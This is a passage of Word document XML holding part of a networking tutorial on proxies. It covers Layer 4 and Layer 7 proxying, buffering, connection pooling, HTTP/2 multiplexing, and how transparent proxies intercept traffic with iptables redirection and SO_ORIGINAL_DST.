    <w:p w14:paraId="472049E8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP splicing:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Some advanced proxies can even merge the two TCP connections into one at the kernel level after initial setup, eliminating all userspace overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC03421" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Extremely fast (near wire-speed). Works with any protocol (MySQL, Redis, custom TCP). Low resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349CB094" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> No content awareness. Can't make decisions based on HTTP headers, URLs, or request content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2EE864" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 HTTP-Level Proxying (Layer 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496413B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43516CD8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client establishes TCP (+TLS) connection to the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C9706A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy fully parses the HTTP request (method, path, headers, body).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA5319" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy applies logic (routing, transformation, caching, auth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782AF97" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy constructs a NEW HTTP request to the backend (may be modified).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B96EE99" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Backend responds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484C4D02" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy parses the response, may modify it, sends to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32330F02" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal request lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD38BED" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DABF8E3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>1. Accept client connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3977E49F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>2. Read bytes until complete HTTP request is buffered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A7E87" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>3. Parse request line: GET /api/users HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724E7EC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>4. Parse headers: Host, Content-Type, Authorization, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE20B45" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>5. Read body (if present, using Content-Length or chunked encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D73B4B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>6. Apply pre-processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A954C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">   - Authentication/authorization check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680E518F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">   - Rate limit check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085BC9B2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">   - Request transformation (add/remove headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445576F9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">   - Cache lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC208F9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>7. Select backend (routing rules, load balancing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DEFC1E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>8. Forward request to backend (over a pooled connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007AE591" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>9. Read backend response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C596EA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>10. Apply post-processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B3B12" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    - Response transformation (add headers, compression)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6355D904" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">    - Cache storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F736737" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>11. Send response to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394BA98F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The buffering question:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4A11A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full buffering:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Proxy reads the ENTIRE request/response before forwarding. Allows inspection/transformation of the full body. Costs memory. Adds latency (body must be fully received before forwarding starts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95273A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Streaming (chunked forwarding):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Proxy forwards data as it arrives. Low latency, low memory. But can't inspect/modify the full body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470ED288" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hybrid:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Buffer headers (for routing decisions), stream the body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF8BFE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Nginx by default buffers the full response from the backend before sending to the client. This frees the backend connection quickly (backend doesn't wait for the slow client). Configurable via proxy_buffering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9A47EB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 The Connection Management Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5E87F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client-side connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F754013" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>With millions of clients, the proxy may have millions of front-end connections. Each consumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5028277D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>A file descriptor (Linux default limit: 1024, tunable to millions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7FD9BA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>A TCP socket buffer (~128KB receive + send).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D07CF3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>TLS session state (~10–50KB per connection with session resumption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175661F4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F881CA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy maintains a CONNECTION POOL to each backend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43980C68" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Instead of opening a new TCP connection for every request, reuse existing connections (HTTP keep-alive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B20CC72" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Pool size is limited (e.g., 100 connections per backend).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74500302" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Connections are borrowed for a request, returned after response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C905C83" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why connection pooling matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939DFF1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>TCP connection establishment costs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50C592" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>1 RTT for TCP handshake (SYN → SYN-ACK → ACK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B81B2E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>1–2 RTT for TLS handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF75C78" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Slow start: new connections start with small congestion windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A3609A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>With pooling: amortize this cost across thousands of requests. A pooled connection is already established, already past slow start, already has an optimized congestion window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDDB32" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiplexing with HTTP/2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8EF28A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy can multiplex hundreds of concurrent requests over a single backend connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB8F1E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>One TCP connection carries many HTTP/2 streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE5CD2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each stream is an independent request/response pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112BC5EC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>No head-of-line blocking at the HTTP level (but still at TCP level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5754BC36" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>This reduces the connection pool size needed from hundreds to potentially single digits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C53669" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="14212402">
          <v:rect id="_x0000_i3319" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C54F54" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Transparent Proxy — Invisible Interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C814D03" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 What Makes a Proxy "Transparent"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677463E6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>The client has NO knowledge of the proxy. It's not configured anywhere. Traffic is intercepted without the client's cooperation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77295966" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 How Transparent Proxying Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08579F03" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network-level interception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247BDA6F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Router/switch redirects traffic:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The network infrastructure (via policy-based routing, WCCP, or iptables) redirects packets destined for port 80/443 to the proxy instead of their original destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E778B79" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The interception mechanism (iptables example):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E6ED0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DCA7A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends packet: src=10.0.1.5, dst=93.184.216.34:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2D648B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>iptables REDIRECT rule: packets to port 80 → redirect to localhost:3128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1476E125" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy receives the packet on port 3128.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA80835" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The proxy must know the original destination:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Since the packet was redirected, the proxy uses SO_ORIGINAL_DST socket option (Linux) to discover that the client originally intended to reach 93.184.216.34:80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4FA2D5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy connects to the REAL destination</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (93.184.216.34:80) on behalf of the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626AD74" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client never knows</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — from its perspective, it connected directly to the destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D92072" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WCCP (Web Cache Communication Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE7F11" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Used between Cisco routers and transparent proxy caches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D9E39" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
